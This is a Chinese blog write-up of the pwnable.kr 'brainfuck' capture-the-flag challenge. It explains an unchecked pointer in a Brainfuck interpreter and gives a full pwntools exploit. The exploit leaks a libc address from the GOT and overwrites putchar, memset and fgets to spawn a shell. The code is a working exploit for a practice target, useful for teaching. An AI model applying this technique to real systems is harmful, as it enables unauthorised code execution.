pwnable.kr brainfuck writeup

最新推荐文章于 2022-01-24 15:05:32 发布
最新推荐文章于 2022-01-24 15:05:32 发布
阅读量1.7k 收藏
点赞数
分类专栏: pwnable.kr writeup pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_29343201/article/details/67635914
版权

题目

I made a simple brain-fuck language emulation program written in C.
The [ ] commands are not implemented yet. However the rest functionality seems working fine.
Find a bug and exploit it to get a shell.

Download : http://pwnable.kr/bin/bf
Download : http://pwnable.kr/bin/bf_libc.so

Running at : nc pwnable.kr 9001

分析

基本分析

题目为一个brainfuck的解释器,其中使用全局变量来模拟指针位置,不过没有检测指针越界,指针一开始位于bss段,可以通过移动指针使其指向got表,因为没有开启got表只读,所以通过写got表就可以获取shell了。

不过有一个问题就是重写什么能够改写参数,这里如果改写putchar是不行的,虽然可以进入system但是没办法处理参数,所以最后的方法是将putchar改为main函数,然后再次进入main函数过程,利用将memset改为gets,将fgets改为system获取shell。

exp

题目比较简单,直接看exp即可

from pwn import *
context(os='linux', arch='i386', log_level='debug')

DEBUG = 0
if DEBUG:
    p = process('./bf')
    libc = ELF('/usr/lib32/libc.so.6')
else:
    p = remote('pwnable.kr', 9001)
    libc = ELF('./bf_libc.so')

def main():
    #pwnlib.gdb.attach(p)
    p.recvuntil(']')

    put_char_offset = 0x8048a0a0 - 0x8048a030
    payload = '.'
    payload += '<' * put_char_offset
    payload += '.>' * 4
    payload += '<,' * 4 # write put_char
    payload += '<' * 4
    payload += ',>' * 4 # write memset
    payload += '<' * (0x2c - 0x10 + 4)
    payload += ',>' * 4 # write fgets
    payload += '.' * (0x400 - len(payload) - 1)
    p.send(payload)
    p.recv()
    if DEBUG:
        leak = p.recv()[1:]
    else:
        p.recv()
        leak = p.recv()

    log.info('get:' + str(len(leak)))
    log.info('leak:' + hex(u32(leak)))

    putchar_pos = u32(leak)
    libc_base = putchar_pos - libc.symbols['putchar']
    system_addr = libc_base + libc.symbols['system']
    gets_addr = libc_base + libc.symbols['gets']
    main_addr = 0x08048671

    log.info("libc base at:" + hex(libc_base))

    packed_gadget_pos = p32(0x08048671)

    # write put char
    for x in (packed_gadget_pos[::-1]):
        p.send(x)

    # write memset
    for x in p32(gets_addr):
        p.send(x)

    for x in p32(system_addr):
        p.send(x)

    p.recvuntil(']')
    payload = '/bin/sh\x00'
    p.send(payload)

    p.interactive()




if __name__ == '__main__':
    main()
Anciety
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pwnable 笔记 Rookiss - brain fuck - 150 pt
HiTaQini
12-15 3072
终于打到第二关了... 这题考察GOT覆写
pwnable brain fuck(bss段的用途)
九层台
09-26 645
题目链接传送门 这里题目跟网鼎杯线下赛的一个pwn有些相似。 输入一些字符可以控制一个指针,可以向这个指针指向的地址处写数据。 首先要知道bss段里面有什么。 在这道题里面的p指针的更高地址处是stdin,stdout,stderr然后是函数的got表,这里可以控制指针p泄露和修改got表。 #coding=utf-8 from pwn import * p=0x0804a0a0 putcha...
pwnable BrainFuck,GOT表重写
nibiru_holmes的博客
03-10 1174
题目链接:http://pwnable.kr/play.php BrainFuck是什么鬼,百度一下..... Brainfuck是一种极小化的计算机语言,它是由Urban Müller在1993年创建的。由于fuck在英语中是脏话,这种语言有时被称为brainf*ck或brainf**k,甚至被简称为BF。 其实就是闲着没事做出来的一种语言。 看看
pwnable.kr - brain fuck
加号减减号的博客
03-06 820
题目简介 分析 writeup 题目简介 Brain fuck 是 pwnable.kr 第二阶段的第一道题,考察了覆些 GOT 表等知识点。题目信息如下: 分析 将下载得到的 bf 文件拖进 IDA 中查看,发现程序主要由 main 函数以及 do_brainfuck 函数组成,且没有开启 PIE。 main 函数如下: int __cdecl main...
pwnable.krbrainfuck
weixin_30530523的博客
08-03 141
pwnable.kr第二关第一题: ========================================= Download : http://pwnable.kr/bin/bfDownload : http://pwnable.kr/bin/bf_libc.so Running at : nc pwnable.kr 9001 =======================...
brainfuck解密 ook-master.zip
03-03
**脑洞编程语言:Brainfuck 解密指南** 在IT领域,有一些编程语言因其独特性和挑战性而备受关注,其中Brainfuck就是一种极简主义的、几乎难以理解的编程语言。这个压缩包文件“ook-master.zip”显然与Brainfuck有关...
brainfuck解码.cpp
最新发布
07-13
brainfuck解码
brainfuck-compile.py
07-13
brainfuck-compile
brainfuck解密
02-19
Brainfuck是一种极其简洁的编程语言,由Urban Müller在1993年设计,其初衷是为了探索编程语言的极限。由于其名称中包含不雅词汇,所以有时会用"brainf*ck"或"brainf**k"来替代,简称为BF。这种语言的设计极度简化,...
Brainfuck和ook!解码脚本
07-31
Brainfuck和ook!解码python脚本,方便离线使用
pwn训练 pwnable.kr brainfuck
doudoudedi
09-08 358
这是一道pwnable第二模块的题目 这道题开始看不懂emem,发现是一个brainfuck的解释器发现有对内存可以读写控制的函数还有一个野指针emem就是他了开始发现只要把memset函数覆写成为gets然后输入/bin/sh再是将fgets覆写成为system 第一步泄露putchar函数的真实地址然后算出libc基址 计算出system,gets的地址 在将putchar写成main 然后就...
pwnable.kr brain fuck
r250414958的博客
05-03 312
老样子,先审题 给了两个文件,先下下来 bf拖ida里康康,使用F5大法 int __cdecl main(int argc, const char **argv, const char **envp) { size_t i; // [esp+28h] [ebp-40Ch] char s[1024]; // [esp+2Ch] [ebp-408h] unsigned int v6; ...
pwnablebrainfuck
pwd_3的博客
09-29 427
问题分析程序没有对p的访问空间做限制,导致可以任意内存读写,在.bss段前面是存放got的地方。基本思路是:先读取got中的值泄露libc地址,再根据bf_libc.so计算其他函数偏移。接下来是写,覆盖原有got值为指定函数地址来getshell遇到问题最开始想覆盖putchar的got值为system的地址,但无法控制system的参数。思维僵化 真的是,怎么就没想到覆盖成__start的地址,
reversing.kr Easy_CrackMe的题解思路
qq_28353517的博客
05-27 2182
首先笔者,第一步运行了软件 随意输了一部分弹窗为 笔者习惯利用ida首先静态调试,所以直接拖进ida 首先思路查找输出的字符串,因为题目比较简单我们找到了main函数的位置 之后我们向前翻,找到函数的起始部分: 我们首先找到怎样跳转到错误的地址loc_401135,发现文中上下文中有四个跳转,我们大致可以猜测进行了四次比较,找到每一次的跳转,我们可以发现其实是做了一
ctfshow简单密码题
babywhale_bi的博客
01-24 5007
brainfuck/Ook编码 这里提供一个链接: 可对Ook和Brainfuck编码进行在线解密: Brainfuck/Ook! Obfuscation/Encoding [splitbrain.org] Ook编码: ook密码中有大量ook,加上一些符号; Ook密码题常见题型为: brainfuck编码常见题型为: brainfuck语言用> < + - . , [ ]八种符号来替换C语言的各种语法和命令: 例如: +++++++++++++++++.>++++++
Brainfuck语言入门
nameofcsdn的博客
11-29 2万+
Brainfuck语言是一种很图灵机的图灵机。 这个编程语言只有8种有效字符,其实就是8种指令: 字符 含义 > 指针加一 < 指针减一 + 指针指向的字节的值加一 - 指针指向的字节的值减一 . 输出指针指向的单元内容(ASCⅡ码)
Brainfuck
Tiko.T的部落格
04-25 3861
Brainfuck 是一门非常简单甚至可以说是最简单的编程语言,wikipedia。 它的语法由一个8个字符的字符集组成,即&gt;&lt;+=.,[]八个字符。brainfuck的模型还包括一个以字节为单位、被初始化为零的数组、一个指向该数组的指针(初始时指向数组的第一个字节)、以及用于输入输出的两个字节流。 这八个字符每一个都是一条指令: &gt; 指针加一 &lt; ...
常用编码:Shift_JIS, GBK,EUCKR,Big5,UTF8,CP1252
热门推荐
hellofeiya的专栏
12-27 3万+
(1) Shift_JIS Shift_JIS是一个日本电脑系统常用的编码表。它能容纳全角及半角拉丁字母、平假名、片假名、符号及日语汉字。 它被命名为Shift_JIS的原因,是它在放置全角字符时,要避开原本在0xA1-0xDF放置的半角假名字符。 在微软及IBM的日语电脑系统中,即使用了这个编码表。这个编码表称为CP932。 目录  [隐藏]  1字节结构2S
写一个brainfuck语言的解释器
BananaTree
06-26 5012
Brainfuck 语法介绍有一种很神奇的编程语言叫做brainfuck. 很多人都学过C++, Java, Python等主流的语言,总是会有一种“天哪,语法好复杂”的感觉,brainfuck的语法则超级简单: 字符命令 含义 > 指针右移一个单位 < 指针左移一个单位 + 当前数据加一 - 当前数据减一 . 输出当前数据 , 读入一个字节并赋
brainfuck编译器
08-23
Brainfuck编译器是一种适用于x86和64位Linux系统的编译器,它可以将Brainfuck源代码直接汇编、编译和链接成可执行文件。 Brainfuck编程语言是一种相对较难理解的语言,其解释器需要通过移动指针和对值进行加减操作...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值